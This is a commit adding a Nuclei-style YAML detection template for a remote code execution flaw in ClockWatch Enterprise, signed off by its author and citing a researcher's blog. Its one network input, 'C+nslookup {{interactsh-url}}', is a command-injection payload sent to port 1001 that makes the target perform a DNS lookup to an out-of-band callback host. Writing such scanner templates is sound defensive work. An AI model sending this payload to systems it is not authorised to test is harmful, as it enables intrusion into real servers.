Create clockwatch-enterprise-rce.yaml
Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>patch-1
parent
83b9b4f341
commit
a722b9fff6
|
@ -0,0 +1,22 @@
|
|||
id: clockwatch-enterprise-rce
|
||||
|
||||
info:
|
||||
name: ClockWatch Enterprise RCE
|
||||
author: gy741
|
||||
severity: critical
|
||||
tags: clockwatch,rce
|
||||
reference: https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
|
||||
|
||||
network:
|
||||
- inputs:
|
||||
- data: "C+nslookup {{interactsh-url}}"
|
||||
|
||||
host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Hostname}}:1001"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
Loading…
Reference in New Issue